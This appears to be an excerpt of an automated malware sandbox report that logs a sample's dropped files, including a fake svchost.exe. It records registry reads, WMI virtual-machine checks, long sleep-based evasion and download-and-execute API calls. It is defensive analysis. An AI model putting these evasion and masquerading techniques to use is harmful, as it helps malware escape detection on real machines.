Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004001	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C01	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000423	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000402	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C04	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001404	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000804	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001004	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000404	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000405	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000406	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000465	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000813	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000413	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C09	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002809	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001009	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001809	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002009	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C09	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C09	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000809	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003009	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000425	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000429	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040B	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C07	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000407	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001407	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001007	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000807	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000408	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040D	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000439	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000421	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000410	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000810	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000411	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000044B	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043F	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000412	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000440	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000426	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000427	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000083E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000450	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000414	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000415	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000416	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000816	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000418	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000419	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C1A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041B	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000424	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000400A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000340A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000240A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000300A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000440A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000480A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000280A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000500A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000380A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000200A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000441	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081D	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041D	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000045A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041F	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000422	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000042A	Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\Temp\ .exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem WHERE Name="user-PC"

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\Temp\server.exe	Last function: Thread delayed
Source: C:\Windows\Temp\server.exe	Last function: Thread delayed
Source: C:\Windows\Temp\v5.exe	Last function: Thread delayed
Source: C:\Windows\Temp\v5.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\033726\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\033726\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405302
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405CD8 FindFirstFileA,FindClose,	0_2_00405CD8
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	3_2_10001A20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	3_2_100014B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	3_2_10008B50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	3_2_10008520
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose,	3_2_10008E40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_100086F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	3_2_10008F00
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,	5_2_0045B051
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose,	5_2_00405260
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA,	5_2_00439D40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	8_2_10001A20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	8_2_10008B50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	8_2_100014B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	8_2_10008520
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008E40 FindFirstFileA,FindClose,FindClose,	8_2_10008E40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	8_2_100086F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	8_2_10008F00

Source: C:\Windows\Temp\server.exe

3_2_1000AA30

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_00406090 6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,

2_2_00406090

Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 1200000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000

Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user	Jump to behavior

Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: server.exe, 00000003.00000002.2683900710.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lSTORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: .exe.0.dr	Binary or memory string: 00-50-56 VMWare, Inc.
Source: v5.exe, 00000002.00000002.1330252488.0000000000794000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}}
Source: .exe.0.dr	Binary or memory string: 00-1C-14 VMware, Inc
Source: .exe.0.dr	Binary or memory string: 00-0C-29 VMware, Inc.
Source: svchost.exe, 00000008.00000002.2659797363.0000000000885000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
